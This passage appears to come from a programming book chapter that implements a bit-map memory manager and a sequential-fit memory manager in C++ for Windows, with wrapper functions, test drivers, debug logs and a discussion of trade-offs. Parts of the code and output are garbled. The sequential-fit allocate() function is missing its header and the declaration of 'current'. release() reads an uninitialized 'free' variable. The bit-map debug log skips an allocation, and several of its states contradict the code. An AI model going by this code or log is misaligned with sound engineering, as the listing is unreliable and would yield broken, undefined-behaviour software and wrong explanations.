}/*end deleteAll----------------------------------------------*/
void BinarySearchTree::printTree(struct BiNode *link, int level)
{
int i;
if(link==NULL)
{
return;
}
printTree((*link).right,level+1);
for(i=0;i<level;i++){ printf("-");}
printf("(%d)\n",(*link).value);
printTree((*link).left,level+1);
return;
}/*end printTree----------------------------------------------*/
int BinarySearchTree::getHeight(struct BiNode *link)
{
int u;
int v;

if(link==NULL){ return(-1); }

u = getHeight((*link).left);
v = getHeight((*link).right);

if(u>v){ return(u+1); }
else{ return(v+1); }
}/*end getHeight----------------------------------------------*/
bitmap.cpp
The BitMap class is also fairly straightforward in its implementa-
tion and could be reused for something else:
/*
1 bitmap bit = 16-byte block of memory
1 bitmap byte (i.e., 8 bits) = 128 bytes of memory
*/
#define BYTES_PER_BITMAP_BIT 16
#define BYTES_PER_BITMAP_BYTE 128
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ declarations
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
class BitMap
{
private:
unsigned char *map;
unsigned long nbytes;
unsigned long nbits;
public:
BitMap(unsigned long nblocks);
~BitMap();
unsigned long getByteSize();
void setBits(int val,unsigned long nbits,unsigned long
index);
int getBit(unsigned long index);
long getBitRun(unsigned long size);
void printMap();
};
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ definitions
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
BitMap::BitMap(unsigned long nblocks)
{
unsigned long i;

nbytes = nblocks/8;
if(nblocks%8){ nbytes++; }
nbits = nbytes*8;

map = (unsigned char*)malloc(nbytes);
if(map==NULL)
{
printf("BitMap::BitMap(): could not allocate map\n");
exit(1);
}

for(i=0;i<nbytes;i++){ map[i]=0xFF; }
printf("BitMap::BitMap(): nbytes=%lu",nbytes);
printf(", nbits=%lu\n",nbits);
return;
}/*end constructor--------------------------------------------*/
BitMap::~BitMap()
{
printf("BitMap::~BitMap(): freeing map[%ld]\n",nbytes);
free(map);
return;
}/*end destructor---------------------------------------------*/
unsigned long BitMap::getByteSize()
{
return(nbytes);
}/*end getByteSize()------------------------------------------*/
/*
set nbits to val(i.e., 0,1) starting at bit specified by index
*/
void BitMap::setBits
(
int val,
unsigned long nbits,
unsigned long index
)
{
unsigned long bit;
unsigned long i,j;
unsigned char mask;
bit=0;
for(i=0;i<nbytes;i++)
{
mask = 1;
for(j=0;j<8;j++)
{
if(bit>=index)
{
if(bit==index+nbits){ return;}
if(val){ map[i]=map[i]|mask; }
else{ map[i]=map[i]&(~mask); }
}
bit++;
mask = mask*2;
}
}
return;
}/*setBits----------------------------------------------------*/
/*
returns the value of the specified bit (0 to nbits-1)
or -1 if index is out of bounds
*/
int BitMap::getBit(unsigned long index)
{
unsigned long bit;
unsigned long i,j;
unsigned char mask;

bit=0;
for(i=0;i<nbytes;i++)
{
mask = 1;
for(j=0;j<8;j++)
{
if(bit==index)
{
if(map[i]&mask){ return(1); }
else{ return(0); }
}
bit++;
mask = mask*2;
}
}
return(-1);
}/*getBit-----------------------------------------------------*/
/*
returns the index that marks the start of 'size' bits set to 1
or returns -1 if such a run was not found
*/
long BitMap::getBitRun(unsigned long size)
{
unsigned long current_size;
unsigned long bit;
unsigned long i,j;
unsigned char mask;

current_size=0;
bit=0;
for(i=0;i<nbytes;i++)
{
mask = 1;
for(j=0;j<8;j++)
{
if(map[i]&mask)
{
current_size++;
if(current_size==size){ return(bit-size+1); }
}
else
{
current_size=0;
}
bit++;
mask = mask*2;
}
}
return(-1);
}/*getBitRun--------------------------------------------------*/
void BitMap::printMap()
{
unsigned long bit;
unsigned long i,j;
unsigned char mask;
bit=0;
for(i=0;i<nbytes;i++)
{
mask = 1;
printf("byte[%u]=%x\n",i,map[i]);
for(j=0;j<8;j++)
{
if(map[i]&mask){ printf("1"); }
else{ printf("0"); }
bit++;
mask = mask*2;
}
printf("\n\n");
}
return;
}/*end printMap-----------------------------------------------*/
memmgr.cpp
This source file brings the two previous data structures together to
form an actual memory manager, known fittingly as the Memory-
Manager class.
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ declarations
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
class MemoryManager
{
private:
BinarySearchTree bst;
BitMap *bmap;
HANDLE handle; //handle to heap
unsigned char *mem; //actual memory to manage
unsigned long memLength; //size in bytes of memory
public:
MemoryManager(unsigned long totalbytes);
~MemoryManager();
void* allocate(unsigned long nbytes);
void release(void *ptr);
void printState();
};
/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ definitions
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
/*
sets the total amount of memory to manage (no resizing in this case);
each byte in the BitMap represents BYTES_PER_BITMAP_BYTE bytes of
memory
*/
MemoryManager::MemoryManager(unsigned long totalbytes)
{
//init 3 dynamic objects: bmap, bst, mem[]
bst.root_ptr=NULL;
bmap = new BitMap((totalbytes/BYTES_PER_BITMAP_BIT)+1);
memLength = (*bmap).getByteSize()*BYTES_PER_BITMAP_BYTE;
handle = GetProcessHeap();
if(handle==NULL)
{
printf("MemoryManager::MemoryManager(): invalid
handle\n");
return;
}
mem = (unsigned char*)HeapAlloc(handle,HEAP_ZERO_MEMORY,memLength);
if(mem==NULL)
{
printf("MemoryManager::MemoryManager():");
printf("could not alloc memory\n");
exit(1);
}
printf("MemoryManager::MemoryManager():");
printf("mallloc() mem[%lu]\n",memLength);
return;
}/*end constructor--------------------------------------------*/
MemoryManager::~MemoryManager()
{
//release resources for objects: bmap, bst, mem[]
delete(bmap);
bst.deleteAll(&(bst.root_ptr));
if(HeapFree(handle,HEAP_NO_SERIALIZE,mem)==0)
{
printf("MemoryManager::~MemoryManager(): HeapFree()
failed\n");
return;
}
printf("MemoryManager::~MemoryManager():");
printf("free() mem[%lu]\n",memLength);
return;
}/*end destructor---------------------------------------------*/
void* MemoryManager::allocate(unsigned long nbytes)
{
unsigned long run_bits;
long index;
struct BiNode node;

PRINT("MemoryManager::allocate(): request %lu bytes\n",nbytes);

run_bits = (nbytes/BYTES_PER_BITMAP_BIT)+1;
PRINT("MemoryManager::allocate(): run_bits=%lu\n",run_bits);
index = ((*bmap).getBitRun(run_bits));
if(index==-1){ return(NULL); }

PRINT("MemoryManager::allocate(): found run of %lu bits at %ld\n",
run_bits,index);

(*bmap).setBits(0,run_bits,index);

node.value = (unsigned long)(&mem[index*BYTES_PER_BITMAP_BIT]);
node.index = index;
node.nreserved = run_bits;
bst.insertNode(&(bst.root_ptr),&node);
PRINT("MemoryManager::allocate(): address=%lu\n",&mem
[index*16]);
return((void*)&mem[index*16]);
}/*end allocate-----------------------------------------------*/
void MemoryManager::release(void *ptr)
{
struct BiNode *biptr;
unsigned long addr;

if(ptr==NULL){ return; }

addr = (unsigned long)ptr;
PRINT("MemoryManager::release(): address=%lu\n",addr);

/* use the BST to determine how many bit map bits to give back */
biptr = bst.findNode(bst.root_ptr,addr);
if(biptr==NULL){ return; }

(*bmap).setBits(1,(*biptr).nreserved,(*biptr).index);
bst.deleteNode(&(bst.root_ptr),addr);
return;
}/*end release------------------------------------------------*/
void MemoryManager::printState()
{
printf("-----------------------------------------------\n");
(*bmap).printMap();
printf("-----------------------------------------------\n");
bst.printTree(bst.root_ptr,0);
printf("-----------------------------------------------\n");
return;
}/*end printState---------------------------------------------*/
mallocV1.cpp
This file supplies wrappers that allow the MemoryManager class
to be used under the guise of the newMalloc() and newFree()
functions so that existing applications will only have to be slightly
modified.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_MEM_MGR
//#define DEBUG_MALLOCV1
#include<tree.cpp>
#include<bitmap.cpp>
#include<memmgr.cpp>
/*
wrapper functions
*/
MemoryManager *mmptr;
void closeMemMgr()
{
delete(mmptr);
}
void initMemMgr(unsigned long totalbytes)
{
mmptr = new MemoryManager(totalbytes);
}

void* newMalloc(unsigned long size)
{
void *ptr;
ptr = (*mmptr).allocate(size);

#ifdef DEBUG_MALLOCV1
(*mmptr).printState();
#endif
return(ptr);
}
void newFree(void *ptr)
{
(*mmptr).release(ptr);

#ifdef DEBUG_MALLOCV1
(*mmptr).printState();
#endif
return;
}
The DEBUG_XXX macros, defined at the top of this file, activate a
set of debugging printf() statements in each file. For the
performance test run, I commented these macros out so that none of
the printf() statements made it into the build.
perform.cpp
In addition to the PerformanceTest class described earlier, this
file also contains the definition of the PerformanceTest-
Driver() function that will be called from main().
void PerformanceTestDriver()
{
double p[8] = {.15, .20, .35, .20, .02, .04, .02, .02};
unsigned long x[8] = {16,32,64,128,256,512,1024,4096};
struct TestData td;

td.dptr = p;
td.lptr = x;
td.samplesize = 1024; /* number of allocations; exact value assumed */
td.length = 8;

PerformanceTest pt = PerformanceTest(&td);
printf("msecs=%lu\n",pt.runTest());
return;
}/*end PerformanceTestDriver----------------------------------*/
driver.cpp
This file is where everything comes together. The main() function
contains a call to debugTest() and PerformanceTest-
Driver(). For diagnostic builds, I activate the debug macros in
mallocV1.cpp and then comment out the Performance-
TestDriver()function call. For the build that tests performance,
I comment out the debug macros and the debugTest() function
invocation. The version of driver.cpp below is set up to build an
executable that runs a performance test.
#include<mallocV1.cpp>
#include<perform.cpp>
void debugTest()
{
void *ptr[10];
int i;
initMemMgr(270);
ptr[0] = newMalloc(8);
ptr[1] = newMalloc(12);
ptr[2] = newMalloc(33);
ptr[3] = newMalloc(1);
ptr[4] = newMalloc(122);
ptr[5] = newMalloc(50);
for(i=0;i<6;i++){ newFree(ptr[i]); }
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//for the debug test, should activate debug macros in
//mallocVx.cpp
//debugTest();
PerformanceTestDriver();
}/*end main---------------------------------------------------*/
Tests
I performed two different tests against this memory manager. A
debug test was performed to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
The debug test was performed by executing the code in the
debugTest() function defined in the driver.cpp source file. I
keep things fairly simple, but at the same time, I take a good, hard
look at what is going on. If you decide to run a debug test, you will
want to make sure that the DEBUG_XXX macros in malloc-
V1.cpp are turned on. You will also want to comment out the
PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager. After every allocation and release, I print out the
contents of the bit map and the binary search tree. This provides a
state snapshot of the memory manager. Also, the bits in each bit
map byte read from left to right (which is to say that the lower order
bits are on the left-hand side):
BitMap::BitMap(): nbytes=3, nbits=24
MemoryManager::MemoryManager():malloc() mem[384]
MemoryManager::allocate(): request 8 bytes
MemoryManager::allocate(): run_bits=1
MemoryManager::allocate(): found run of 1 bits at 0
-----------------------------------------------
MemoryManager::allocate(): request 33 bytes
MemoryManager::allocate(): run_bits=3
MemoryManager::allocate(): found run of 3 bits at 2
insertNode(): moving right
insertNode(): moving right
insertNode(): inserting 5373996
MemoryManager::allocate(): address=5373996
-----------------------------------------------
byte[0]=e0
00000111
byte[1]=ff
11111111
byte[2]=ff
11111111
-----------------------------------------------
--(5373996)
-(5373980)
(5373964)
-----------------------------------------------
MemoryManager::allocate(): request 1 bytes
MemoryManager::allocate(): run_bits=1
MemoryManager::allocate(): found run of 1 bits at 5
-----------------------------------------------
byte[0]=0
00000000
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
-----(5374188)
----(5374060)
---(5374044)
--(5373996)
-(5373980)
(5373964)
-----------------------------------------------
MemoryManager::release(): address=5373964
deleteNode(): freeing 5373964
-----------------------------------------------
byte[0]=1
10000000
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
----(5374188)
---(5374060)
--(5374044)
-(5373996)
(5373980)
-----------------------------------------------
MemoryManager::release(): address=5373980
deleteNode(): freeing 5373980
-----------------------------------------------
byte[0]=3
11000000
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
---(5374188)
--(5374060)
-(5374044)
(5373996)
-----------------------------------------------
MemoryManager::release(): address=5373996
deleteNode(): freeing 5373996
-----------------------------------------------
byte[0]=1f
11111000
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
--(5374188)
-(5374060)
(5374044)
-----------------------------------------------
MemoryManager::release(): address=5374044
deleteNode(): freeing 5374044
-----------------------------------------------
byte[0]=3f
11111100
byte[1]=0
00000000
byte[2]=fc
00111111
-----------------------------------------------
-(5374188)
(5374060)
-----------------------------------------------
MemoryManager::release(): address=5374060
deleteNode(): freeing 5374060
-----------------------------------------------
byte[0]=ff
11111111
byte[1]=3f
11111100
byte[2]=fc
00111111
-----------------------------------------------
(5374188)
-----------------------------------------------
MemoryManager::release(): address=5374188
deleteNode(): freeing 5374188
-----------------------------------------------
byte[0]=ff
11111111
byte[1]=ff
11111111
byte[2]=ff
11111111
-----------------------------------------------
-----------------------------------------------
BitMap::~BitMap(): freeing map[3]
MemoryManager::~MemoryManager():free() mem[384]
The performance test was nowhere near as extended with regard to
the output that it produced. This was primarily because all the
debugging printf() statements had been commented out of the build.
Trade-Offs
Bit mapped memory managers have the benefit of providing a
straightforward way to organize memory that, depending on the
bit-to-memory ratio, can minimize internal fragmentation. Many
early operating systems used bit maps to help manage memory
because bit maps are fixed in size and thus can be placed outside of
the chaos of the kernel’s dynamic memory pools. For example, if
each bit in a bit map represents 16 bytes of memory, a 512KB bit
map will be needed to manage 64MB of memory. Although this
doesn’t include the storage needed for the associated BST, you can
see that the overhead isn’t that bad.
On the other hand, finding a run of free bits in a bit map means
that you may have to traverse the entire set of bits to find what you
are looking for (assuming that you do find it). This mandatory
searching makes allocation very expensive in terms of execution
time.
If I had to improve this code, I would replace the binary search
tree with a tree data structure that is guaranteed to be well-bal-
anced. As you can see from the debug output, the binary tree that
was formed was worst-case unbalanced (and that’s an understate-
ment). This is more a function of the request stream than of
anything else.
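As an illustration, a hedged sketch of this improvement (my own,
and not part of this chapter's code) could lean on std::map, which
is typically implemented as a self-balancing red-black tree, to
track each allocation's bit map footprint:

#include <map>

/* what the BST currently records for each allocation */
struct Footprint
{
    unsigned long index;     /* index into the bit map  */
    unsigned long nreserved; /* number of bits reserved */
};

/* keyed by the allocation's linear address; lookups, insertions,
   and deletions stay O(log n) even for sorted request streams */
std::map<unsigned long,Footprint> reserved;

void recordAlloc(unsigned long address,unsigned long index,
unsigned long nreserved)
{
    Footprint fp;
    fp.index = index;
    fp.nreserved = nreserved;
    reserved[address] = fp;
}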
I would also tackle the code in the BitMap class that traverses
the bit map data structure. Most of my BitMap member function
implementations are based on brute force iteration. There are some
circumstances where I could skip needless iteration by being a little
more skillful with implied starting points. For example, it is obvious
that the 18th bit will be in the third byte of the bit map, so there is
no need to cycle through the first two bytes of the map.
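Here is a minimal sketch of that shortcut; the getBitDirect()
function is hypothetical and is not part of the BitMap class:

/* jump straight to the byte that holds a given bit instead of
   iterating from the start of the map */
int getBitDirect(unsigned char *map,unsigned long bitIndex)
{
    unsigned long byteIndex = bitIndex/8;  /* byte holding the bit */
    unsigned char mask = (unsigned char)(1<<(bitIndex%8)); /* bit in byte */
    return((map[byteIndex]&mask)!=0);
}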
malloc() Version 2: Sequential Fit

Before building a sequential fit manager, it is worth taking a quick
look at how an off-the-shelf malloc() parcels out the heap. Consider
the following program (dmalloc.c):
#include<stdio.h>
#include<stdlib.h>

void main()
{
void *ptr[5];
int i;
for(i=0;i<5;i++)
{
ptr[i]=malloc(32);
printf("%p\n",ptr[i]);
}
for(i=0;i<5;i++)
{
free(ptr[i]);
}
return;
}
I compiled this using the following command line:

C:\dos> tcc -mh dmalloc.c
I specified a “huge” memory model (via the -mh option) so that
addresses would be specified in the segment:offset real mode
format.
This program produced the following output while running on
DOS:
193B:0004 ( physical address 193B4 )
193E:0004 ( physical address 193E4 )
1941:0004 ( physical address 19414 )
1944:0004 ( physical address 19444 )
1947:0004 ( physical address 19474 )
As you can see, the library gives each allocation its own 48-byte
block. It is more than likely that the extra 16 bytes are used by the
heap manager to store bookkeeping information about each allocation.
Theory
The sequential fit technique organizes memory into a linear linked
list of free and reserved regions (see Figure 4.7). When an allocation
request occurs, the memory manager moves sequentially through
the list until it finds a free block of memory that can service/fit the
request (hence the name “sequential fit”).
Figure 4.7
Because each block's header is stored inside the heap itself, the
memory being managed can index itself. Logically, the blocks of
memory are
arranged as in Figure 4.7. However, the actual organization of each
block, be it free or reserved, in my implementation is specified by
Figure 4.8.
Figure 4.8
Figure 4.9
Figure 4.10
Figure 4.11
Implementation
Because storage space in the heap is used to help organize heap
memory, the sequential fit memory manager implementation is not
Chapter 4
as prolific as the bit map-based manager. My implementation
requires only four files:
Table 4.3
File Use
driver.cpp contains main(), is the scene of the crime
mallocV2.cpp newMalloc(), newFree() wrappers (2nd version)
perform.cpp implements the PerformanceTest class
memmgr.cpp implements the SequentialFitMemoryManager class
memmgr.cpp
The majority of the real work is performed by the class defined in
this file. The SequentialFitMemoryManager class takes care
of allocating heap storage from Windows and managing it. Both the
allocation and release functions have secondary private helper rou-
tines. The allocation function uses a helper function to split free
blocks. The release function calls a helper function to perform the
actual merging of free memory blocks.
#ifdef DEBUG_SF_MEM_MGR
#define MSG0(arg); printf(arg);
#define MSG1(arg1,arg2); printf(arg1,arg2);
#else
#define MSG0(arg);
#define MSG1(arg1,arg2);
#endif
/*
list element format
|0 3||4 7|| 8 ||9 12||13 .. n|
[PREV][NEXT][STATE][SIZE][payload]
U4 U4 U1 U4 ?

the index i passed to each macro is the index of the first payload
byte of a block; the macros and constants below are reconstructed
from this element format
*/

#define U1 unsigned char
#define U4 unsigned long

#define SZ_HEADER 13
#define START SZ_HEADER

#define PREV(i) (*((U4*)(&ram[(i)-13])))
#define NEXT(i) (*((U4*)(&ram[(i)-9])))
#define STATE(i) (*((U1*)(&ram[(i)-5])))
#define SIZE(i) (*((U4*)(&ram[(i)-4])))

#define FREE 0
#define OCCUPIED 1

char *stateStr[2]={"FREE","OCCUPIED"};
class SequentialFitMemoryManager
{
private:
HANDLE handle;
U1 *ram; /*memory storage*/
U4 size;

void split(U4 addr, U4 nbytes);
void merge(U4 prev, U4 current, U4 next);
public:
SequentialFitMemoryManager(U4 nbytes);
~SequentialFitMemoryManager();
void*allocate(U4 nbytes);
void release(void* addr);
void printState();
};
SequentialFitMemoryManager::SequentialFitMemoryManager(U4
nbytes)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("SequentialFitMemoryManager::");
printf("SequentialFitMemoryManager():");
printf("invalid handle\n");
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<=SZ_HEADER)
{
printf("SequentialFitMemoryManager::");
printf("SequentialFitMemoryManager():");
printf("not enough memory fed to constructor\n");
exit(1);
}
PREV(START)=0;
NEXT(START)=0;
STATE(START)=FREE;
SIZE(START)=size-SZ_HEADER;
MSG0("SequentialFitMemoryManager::");
MSG1("SequentialFitMemoryManager(%lu)\n",nbytes);
return;
}/*end constructor--------------------------------------------*/
SequentialFitMemoryManager::~SequentialFitMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
{
printf("SequentialFitMemoryManager::");
printf("~SequentialFitMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("SequentialFitMemoryManager::");
MSG0("~SequentialFitMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
*/
MSG0("SequentialFitMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("SequentialFitMemoryManager::");
MSG0("allocate(): zero bytes requested\n");
return(NULL);
}
current = START;
while(NEXT(current)!=0)
{
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
current = NEXT(current);
}
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
breaks [free] region into [alloc][free] pair, if possible
*/
void SequentialFitMemoryManager::split(U4 addr,U4 nbytes)
{
if(SIZE(addr)>=nbytes+SZ_HEADER+SZ_HEADER)
{
U4 oldnext;
U4 oldprev;
U4 oldsize;
U4 newaddr;
MSG0("SequentialFitMemoryManager::");
MSG0("split(): split=YES\n");
oldnext=NEXT(addr);
oldprev=PREV(addr);
oldsize=SIZE(addr);
newaddr = addr+nbytes+SZ_HEADER; /*first byte of the new free block's payload*/
NEXT(addr)=newaddr;
PREV(addr)=oldprev;
STATE(addr)=OCCUPIED;
SIZE(addr)=nbytes;
NEXT(newaddr)=oldnext;
PREV(newaddr)=addr;
STATE(newaddr)=FREE;
SIZE(newaddr)=oldsize-nbytes-SZ_HEADER;
}
else
{
MSG0("SequentialFitMemoryManager::");
MSG0("split(): split=NO\n");
STATE(addr)=OCCUPIED;
}
return;
}/*end split--------------------------------------------------*/
void SequentialFitMemoryManager::release(void *addr)
{
U4 free; /*index into ram[]*/
if(addr==NULL)
{
MSG0("SequentialFitMemoryManager::");
MSG0("release(): cannot release NULL pointer\n");
return;
}
MSG0("SequentialFitMemoryManager::");
MSG1("release(%lu)\n",addr);
MSG0("SequentialFitMemoryManager::");
MSG1("address resolves to index %lu\n",free);
if(free<13)
{
MSG0("SequentialFitMemoryManager::");
MSG0("release(): address in first 13 bytes\n");
return;
}
merge(PREV(free),free,NEXT(free));
return;
}/*end release------------------------------------------------*/
/*
4 cases ( F=free O=occupied )
FOF -> [F]
OOF -> O[F]
FOO -> [F]O
OOO -> OFO
*/
void SequentialFitMemoryManager::merge(U4 prev,U4 current,U4 next)
{
/*
first handle special cases of region at end(s)
prev=0 low end
next=0 high end
prev=0 and next=0 only 1 list element
*/
if(prev==0)
{
if(next==0)
{
STATE(current)=FREE;
}
else if(STATE(next)==OCCUPIED)
{
STATE(current)=FREE;
}
else if(STATE(next)==FREE)
{
U4 temp;
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
}
else if(next==0)
{
if(STATE(prev)==OCCUPIED)
{
STATE(current)=FREE;
}
else if(STATE(prev)==FREE)
{
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
}
}
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==OCCUPIED))
{
STATE(current)=FREE;
}
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((STATE(prev)==FREE)&&(STATE(next)==OCCUPIED))
{
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((STATE(prev)==FREE)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("SequentialFitMemoryManager::merge():");
MSG0("merging with both sides\n");
SIZE(prev)=SIZE(prev)+
SIZE(current)+SZ_HEADER+
SIZE(next)+SZ_HEADER;
NEXT(prev)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=prev; }
}
return;
}/*end merge--------------------------------------------------*/
void SequentialFitMemoryManager::printState()
{
U4 i;
U4 current;
i=0;
current=START;
while(NEXT(current)!=0)
{
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
current = NEXT(current);
i++;
}
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
return;
}/*end printState---------------------------------------------*/
mallocV2.cpp
There were several minor alterations to this file, most notably the
presence of a different set of debugging macros. To activate debug-
ging code, uncomment the macros and compile a new build.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_SF_MEM_MGR
//#define DEBUG_MALLOCV2
#include<memmgr.cpp>
/*
wrapper functions
*/
SequentialFitMemoryManager *mmptr;
void initMemMgr(unsigned long totalbytes)
{
mmptr = new SequentialFitMemoryManager(totalbytes);
}
void closeMemMgr()
{
delete(mmptr);
}
void *newMalloc(unsigned long size)
{
void *ptr = (*mmptr).allocate(size);
#ifdef DEBUG_MALLOCV2
(*mmptr).printState();
#endif
return(ptr);
}
void newFree(void *ptr)
{
(*mmptr).release(ptr);
#ifdef DEBUG_MALLOCV2
(*mmptr).printState();
#endif
return;
}
driver.cpp
As in the last example, this file contains the main() function
definition that invokes the testing code. The debugTest() function
was completely rewritten for this implementation. The
PerformanceTestDriver() function, defined in perform.cpp,
which makes use of the PerformanceTest class, has been left
untouched.
#include<mallocV2.cpp>
#include<perform.cpp>
void debugTest()
{
void *ptr[6];
unsigned long allocs[6]={8,12,33,1,122,50};
int i;
initMemMgr(270);
for(i=0;i<6;i++)
{
ptr[i] = newMalloc(allocs[i]);
if(ptr[i]==NULL){ printf("ptr[%lu]==NULL!\n",i); }
}
printf("\n\nFREE MEMORY------------------------------\n\n");
newFree(ptr[0]); //8
newFree(ptr[3]); //1
newFree(ptr[4]); //122
newFree(ptr[2]); //33
newFree(ptr[1]); //12
newFree(ptr[5]); //50
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//for the debug test, should activate debug macros in mallocVx.cpp
//debugTest();
//for the performance test, should comment out debug macros
PerformanceTestDriver();
return;
}/*end main---------------------------------------------------*/
Tests
If you look at the main() function defined in driver.cpp, you
will see that I performed both a debug test and a performance test. I
performed a debug test to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
The debug test is fairly simple, but at the same time, I would
take a good, hard look at what is going on. If you decide to run a
debug test, you will want to make sure that the DEBUG_XXX macros
in mallocV2.cpp are turned on. You will also want to comment
out the PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager:
SequentialFitMemoryManager::SequentialFitMemoryManager(270)
SequentialFitMemoryManager::allocate(8)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=FREE][Sz=236][N=0]
SequentialFitMemoryManager::allocate(12)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=FREE][Sz=211][N=0]
SequentialFitMemoryManager::allocate(33)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
SequentialFitMemoryManager::allocate(1)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=FREE][Sz=151][N=0]
SequentialFitMemoryManager::allocate(122)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
SequentialFitMemoryManager::allocate(50)
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
ptr[5]==NULL!
FREE MEMORY-------------------------------------
SequentialFitMemoryManager::release(5439513)
SequentialFitMemoryManager::address resolves to index 13
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
SequentialFitMemoryManager::release(5439605)
SequentialFitMemoryManager::address resolves to index 105
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
SequentialFitMemoryManager::release(5439619)
SequentialFitMemoryManager::address resolves to index 119
